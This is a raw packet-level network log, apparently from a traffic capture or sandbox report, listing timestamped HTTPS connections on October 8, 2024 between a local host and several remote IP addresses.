Oct 8, 2024 20:47:49.540451050 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.540803909 CEST	49933	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.540815115 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.541070938 CEST	49935	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.541102886 CEST	443	49935	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.541371107 CEST	49935	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.541377068 CEST	443	49935	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.541536093 CEST	49932	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.541543007 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.541834116 CEST	49932	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.541838884 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.556485891 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.556930065 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.557009935 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.557271957 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.557287931 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.565850973 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:49.566071987 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:49.567946911 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:49.567979097 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:49.568401098 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:49.569510937 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:49.569571972 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:49.569612980 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:49.590099096 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.590409994 CEST	49934	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.590462923 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.590734005 CEST	49934	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.590745926 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.637006044 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.637119055 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.637190104 CEST	49933	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.637229919 CEST	443	49935	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.637250900 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.637265921 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.637327909 CEST	49933	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.637475014 CEST	49933	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.637506008 CEST	443	49933	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.637651920 CEST	443	49935	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.637715101 CEST	49935	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.637995958 CEST	49935	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.638010979 CEST	443	49935	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.638021946 CEST	49935	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.638025999 CEST	443	49935	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.641479969 CEST	49937	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.641556025 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.641639948 CEST	49937	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.641803980 CEST	49937	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.641830921 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.642359972 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.642982960 CEST	49938	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.643032074 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.643111944 CEST	49938	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.643260002 CEST	49938	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.643304110 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.643399000 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.643460035 CEST	49932	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.643515110 CEST	49932	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.643518925 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.643527985 CEST	49932	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.643531084 CEST	443	49932	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.645920038 CEST	49939	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.646011114 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.646112919 CEST	49939	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.646323919 CEST	49939	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.646359921 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.658593893 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.658696890 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.658761978 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.658791065 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.658823967 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.658885002 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.658936024 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.658936024 CEST	49931	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.658967972 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.658989906 CEST	443	49931	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.660605907 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.660629988 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.660706043 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.660790920 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.660800934 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.694269896 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.694430113 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.694518089 CEST	49934	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.694612980 CEST	49934	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.694649935 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.694677114 CEST	49934	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.694691896 CEST	443	49934	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.697154999 CEST	49941	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.697242022 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:49.697360039 CEST	49941	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.697536945 CEST	49941	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:49.697571993 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.049455881 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:50.049779892 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:50.049887896 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:50.050226927 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:50.050276041 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:50.050307035 CEST	49936	443	192.168.2.5	104.21.79.35
Oct 8, 2024 20:47:50.050323009 CEST	443	49936	104.21.79.35	192.168.2.5
Oct 8, 2024 20:47:50.053402901 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:50.053441048 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:50.053529978 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:50.053817987 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:50.053831100 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:50.583251953 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.583774090 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.583828926 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.584464073 CEST	49937	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.584527969 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.584850073 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:50.584938049 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:50.585122108 CEST	49937	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.585136890 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.585426092 CEST	49939	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.585458994 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.585998058 CEST	49939	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.586025000 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.586173058 CEST	49938	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.586203098 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.586648941 CEST	49938	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.586659908 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.588221073 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:50.588232994 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:50.588433981 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:50.592753887 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:50.592786074 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:50.592818975 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:50.712486982 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.713510036 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.713619947 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.713624954 CEST	49939	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.713674068 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.713757038 CEST	49937	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.713876009 CEST	49937	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.713876963 CEST	49937	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.713901997 CEST	49939	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.713921070 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.713948965 CEST	443	49937	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.713952065 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.713984013 CEST	49939	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.713999987 CEST	443	49939	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.714225054 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.715341091 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.715466976 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.715559006 CEST	49938	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.716578960 CEST	49943	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.716609001 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.716761112 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.716769934 CEST	49938	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.716788054 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.716805935 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.716811895 CEST	49938	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.716814041 CEST	49943	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.716825962 CEST	443	49938	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.716895103 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.717576981 CEST	49943	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.717586994 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.718338013 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.718357086 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.720081091 CEST	49945	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.720112085 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.720320940 CEST	49945	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.720516920 CEST	49945	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.720531940 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.803726912 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.803848982 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.804223061 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.804231882 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.805006027 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.805011034 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.805464983 CEST	49941	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.805525064 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.805725098 CEST	49941	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.805738926 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.904232025 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.904396057 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.904598951 CEST	49941	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.905529022 CEST	49941	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.905529022 CEST	49941	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.905575037 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.905603886 CEST	443	49941	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.908833027 CEST	49946	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.908863068 CEST	443	49946	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.908956051 CEST	49946	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.909146070 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.909148932 CEST	49946	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.909159899 CEST	443	49946	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.909550905 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.909595013 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.909615040 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.909653902 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.909727097 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.909740925 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.909750938 CEST	49940	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.909754992 CEST	443	49940	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.912125111 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.912158966 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:50.912602901 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.912704945 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:50.912717104 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.088485003 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:51.088550091 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:51.088795900 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:51.088891029 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:51.088897943 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:51.088907957 CEST	49942	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:51.088912010 CEST	443	49942	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:51.099663019 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:51.099734068 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:51.099831104 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:51.100231886 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:51.100264072 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:51.353223085 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.353844881 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.353864908 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.353992939 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.354270935 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.354278088 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.354521036 CEST	49943	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.354533911 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.354814053 CEST	49943	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.354818106 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.425321102 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.427882910 CEST	49945	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.427896023 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.428153038 CEST	49945	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.428158045 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.482397079 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.482472897 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.482798100 CEST	49943	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.482942104 CEST	49943	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.482955933 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.482964993 CEST	49943	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.482969046 CEST	443	49943	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.484085083 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.484103918 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.484136105 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.484172106 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.484215021 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.484698057 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.484714031 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.484725952 CEST	49944	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.484733105 CEST	443	49944	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.487133980 CEST	49949	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.487211943 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.487898111 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.487921000 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.487966061 CEST	49949	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.488023043 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.488123894 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.488156080 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.488181114 CEST	49949	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.488198042 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.530284882 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.530364037 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.530620098 CEST	49945	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.530678034 CEST	49945	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.530678034 CEST	49945	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.530711889 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.530749083 CEST	443	49945	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.533242941 CEST	49951	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.533334017 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.533677101 CEST	49951	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.533677101 CEST	49951	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.533756018 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.585330963 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.589272976 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.589291096 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.589735985 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.589741945 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.598221064 CEST	443	49946	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.598716974 CEST	49946	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.598733902 CEST	443	49946	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.599046946 CEST	49946	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.599051952 CEST	443	49946	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.688391924 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.688416958 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.688460112 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.688510895 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.688566923 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.688870907 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.688886881 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.688898087 CEST	49947	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.688905001 CEST	443	49947	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.692229033 CEST	49952	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.692271948 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.692373991 CEST	49952	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.692612886 CEST	49952	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.692643881 CEST	443	49952	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.711575985 CEST	443	49946	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.711728096 CEST	443	49946	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.711833000 CEST	49946	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.711833954 CEST	49946	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.711870909 CEST	49946	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.711889029 CEST	443	49946	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.714112997 CEST	49953	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.714190960 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.714296103 CEST	49953	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.714462996 CEST	49953	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:51.714497089 CEST	443	49953	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:51.771483898 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:51.771581888 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:51.773801088 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:51.773823977 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:51.774082899 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:51.775563955 CEST	49948	443	192.168.2.5	104.102.49.254
Oct 8, 2024 20:47:51.823409081 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.164144993 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.164796114 CEST	49949	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.164844990 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.165179014 CEST	49949	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.165189981 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.166412115 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.166711092 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.166726112 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.166992903 CEST	49950	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.167002916 CEST	443	49950	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.177373886 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.177658081 CEST	49951	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.177690029 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.177926064 CEST	49951	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.177939892 CEST	443	49951	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.302393913 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.303328991 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.303427935 CEST	49949	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.303478956 CEST	49949	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.303478956 CEST	49949	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:52.303519964 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.303544044 CEST	443	49949	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:52.304627895 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.304646015 CEST	443	49948	104.102.49.254	192.168.2.5
Oct 8, 2024 20:47:52.304661036 CEST	443	49948	104.102.49.254	192.168.2.5
